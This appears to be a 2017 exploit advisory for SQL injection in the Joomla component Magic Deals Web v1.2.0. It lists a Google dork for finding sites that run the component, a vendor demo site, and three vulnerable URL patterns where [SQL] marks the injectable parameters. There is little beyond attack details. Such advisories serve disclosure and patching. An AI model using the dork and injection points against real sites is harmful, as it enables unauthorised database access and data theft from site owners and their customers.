19 lines
No EOL
962 B
Text
19 lines
No EOL
962 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component Magic Deals Web v1.2.0 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_magicdealsweb
|
|
# Date: 21.02.2017
|
|
# Vendor Homepage: http://jasonwebdesign.com/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/e-commerce/gifts-a-coupons/magic-deals-web/
|
|
# Demo: http://magicdealsweb.jasonwebdesign.com/
|
|
# Version: 1.2.0
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?filterbycats=all&fullordering=[SQL]&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
|
|
# http://localhost/[PATH]/index.php?filterbycats=[SQL]=final_price+DESC&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
|
|
# http://localhost/[PATH]/index.php/component/magicdealsweb/?option=com_magicdealsweb&view=search&search_in=11&q=[SQL]
|
|
# # # # # |